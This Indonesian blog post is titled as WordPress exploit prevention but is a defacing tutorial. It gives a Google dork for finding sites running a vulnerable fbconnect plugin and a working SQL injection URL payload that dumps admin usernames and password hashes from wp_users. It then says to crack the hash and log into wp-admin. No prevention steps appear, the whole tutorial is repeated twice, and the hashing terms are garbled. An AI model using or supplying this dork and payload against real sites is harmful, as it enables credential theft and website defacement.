Pencegahan Exploit WP - Blogs
Kali ini aq akan share mengenai pengamanan blog WP yang mana suka diacak-acak defacer..
berikut ini tutorial cara Defacer menggunakan Exploit ini..
Pertama masukkan Dork nya dulu di mbah google
Dork: inurl:"fbconnect_action=myhome"
![[Image: untitled24.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhisiWoBwGc37FUM5VFsRHQxJF64s2tos00wZ8xUeiFQ0-8Lv4zDAo30LN-9rOHBvsM7ZxEoVanCBKKucIA-ryJGEmJncSNkKttPQsDQWchRVkDnIrdSgudzwhDClDCgp6BR4DilXS8HtxB/s320/untitled24.JPG)
Klik situs Targetnya
![[Image: untitled22.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTGxmxGvj29CAUf0-Gsll3kHI0J-5tyy3hAJCq4-uJlQB56k9_sjcarq_h48CrDLZamiuY-SEMBXJ96JBDyEaY7azuA8ksFa6QxPowBjWizcwzrjGCvD7zW-DguiJfgVEz1liHVrvZUm4L/s320/untitled22.JPG)
Sekarang ubah URL :
?fbconnect_action=myhome&userid=
Dengan URL ini :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa ss)z0mbyak,7,8,9,10,11,12+from+wp_users--
![[Image: untitled23.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMWWoX-mtiCe4zAhHUEhOgSXGVoAwrrQBY46U9MGqH1SUlZaR6X6m00MimLpwiMN6spnJ1rsBzC4ShRjL9JwobUCiRWYsHHRcNVAcm4VnN9IPSEDQdBvtOnGngREN5t-shx5_DwpZusPUR/s320/untitled23.JPG)
Sekarang keluar Username dan Password Admin.
Encrypt Password MD5 (Blowfish) dengan software yang ada di sini
Sesudah menemukan Passwordnya masuk ke halaman Page wp-admin atau wp-login.php
berikut ini tutorial cara Defacer menggunakan Exploit ini..
Pertama masukkan Dork nya dulu di mbah google
Dork: inurl:"fbconnect_action=myhome"
Klik situs Targetnya
Sekarang ubah URL :
?fbconnect_action=myhome&userid=
Dengan URL ini :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa ss)z0mbyak,7,8,9,10,11,12+from+wp_users--
Sekarang keluar Username dan Password Admin.
Encrypt Password MD5 (Blowfish) dengan software yang ada di sini
Sesudah menemukan Passwordnya masuk ke halaman Page wp-admin atau wp-login.php
Post a Comment